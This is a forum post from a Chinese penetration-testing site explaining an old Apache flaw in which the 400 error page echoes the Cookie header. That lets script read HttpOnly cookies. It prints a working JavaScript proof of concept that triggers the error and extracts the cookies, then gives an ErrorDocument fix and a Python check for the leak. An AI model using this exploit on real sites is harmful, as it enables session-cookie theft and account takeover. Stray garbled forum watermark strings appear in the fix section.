中国网络渗透测试联盟 (China Network Penetration Testing Alliance)
Title: Apache HttpOnly Cookie XSS cross-site vulnerability
Author: admin
Time: 2013-4-19 19:15
Many applications, including commercial and mature open-source CMS/article systems, set the HttpOnly attribute on their cookies to stop XSS from stealing the user's cookie: the attribute prevents JavaScript from reading the cookie directly, which lowers the impact of an XSS. The issue described here can be used to bypass exactly that HttpOnly protection.
Open a site in Chrome, press F12 to open the developer tools, go to the Console, paste the following code and press Enter:
    // http://www.exploit-db.com/exploits/18442/
    function setCookies(good) {
        // Construct string for cookie value
        var str = "";
        for (var i = 0; i < 819; i++) {
            str += "x";
        }
        // Set cookies
        for (i = 0; i < 10; i++) {
            // Expire evil cookie
            if (good) {
                var cookie = "xss" + i + "=;expires=" + new Date(+new Date() - 1).toUTCString() + "; path=/;";
            }
            // Set evil cookie
            else {
                var cookie = "xss" + i + "=" + str + ";path=/";
            }
            document.cookie = cookie;
        }
    }

    function makeRequest() {
        setCookies();
        function parseCookies() {
            var cookie_dict = {};
            // Only react on 400 status
            if (xhr.readyState === 4 && xhr.status === 400) {
                // Replace newlines and match <pre> content
                var content = xhr.responseText.replace(/\r|\n/g, '').match(/<pre>(.+)<\/pre>/);
                // match() returns null when there is no <pre>, so guard before reading .length
                if (content && content.length) {
                    // Remove Cookie: prefix
                    content = content[1].replace("Cookie: ", "");
                    var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
                    // Add cookies to object
                    for (var i = 0; i < cookies.length; i++) {
                        // the "[i]" index was lost when the forum rendered this line
                        var s_c = cookies[i].split('=', 2);
                        cookie_dict[s_c[0]] = s_c[1];
                    }
                }
                // Unset malicious cookies
                setCookies(true);
                alert(JSON.stringify(cookie_dict));
            }
        }
        // Make XHR request
        var xhr = new XMLHttpRequest();
        xhr.onreadystatechange = parseCookies;
        xhr.open("GET", "/", true);
        xhr.send(null);
    }

    makeRequest();
You will then see a glorious 400 error page that contains the cookie information.
Download:
https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
Fix:
Apache officially provides four ways of handling errors (http://httpd.apache.org/docs/2.0/mod/core.html#errordocument), as follows:
* G& W" I2 F" B, I! H4 e
7 \0 w* E5 w' X* p
In the event of a problem or error, Apache can be configured to do one of four things:
1. output a simple hardcoded error message
2. output a customized message
3. redirect to a local URL-path to handle the problem/error
4. redirect to an external URL to handle the problem/error
In testing, only method 2 is effective for 400 errors: with it, the response no longer contains the cookie contents.
Apache configuration:
    ErrorDocument 400 "security test"
Of course, upgrading Apache to the latest version also works :).
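A defender-side check for the same behaviour, added here as an example and not part of the original post: it parses a 400 response body the way the exploit above does and reports whether the Cookie header is still echoed back, so the ErrorDocument fix can be verified; the sample bodies are constructed for the example, not captured from a real server.

```python
import re

# Constructed sample of an Apache 400 page that echoes the offending request
# header inside <pre>...</pre>; the padding cookies xss0/xss1 are the probe's own.
VULNERABLE_400_BODY = (
    "<html><head><title>400 Bad Request</title></head><body>"
    "<h1>Bad Request</h1><p>Your browser sent a request that this server "
    "could not understand.<br />Size of a request header field exceeds "
    "server limit.<br />\n<pre>\nCookie: session=abc123; xss0=xxxxxxxx; "
    "xss1=xxxxxxxx\n</pre>\n</p></body></html>"
)

# Constructed body as served after the post's fix: ErrorDocument 400 "security test"
FIXED_400_BODY = "security test"


def echoed_cookies(body):
    """Return {name: value} for cookies reflected inside <pre>...</pre> of a
    400 body, or {} when the page does not echo the Cookie header."""
    flat = re.sub(r"[\r\n]", "", body)
    m = re.search(r"<pre>(.+?)</pre>", flat)
    if not m or not m.group(1).startswith("Cookie: "):
        return {}
    raw = m.group(1)[len("Cookie: "):]
    # Strip the padding cookies the probe itself set (xssN=xxx...).
    raw = re.sub(r"xss\d+=x+;?", "", raw)
    found = {}
    for pair in raw.split(";"):
        pair = pair.strip()
        if "=" in pair:
            name, value = pair.split("=", 1)
            found[name] = value
    return found


def leaks_request_headers(status, body):
    """True when a 400 response still reflects cookies, i.e. the
    ErrorDocument mitigation (or a patched Apache) is not in effect."""
    return status == 400 and bool(echoed_cookies(body))


def set_cookie_is_httponly(set_cookie_value):
    """Check a Set-Cookie header value for the HttpOnly attribute."""
    attrs = [a.strip().lower() for a in set_cookie_value.split(";")[1:]]
    return "httponly" in attrs
```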
- u5 `8 u3 K" I
' i- V8 n2 b; A
Reference:
http://httpd.apache.org/security/vulnerabilities_22.html
Welcome to 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2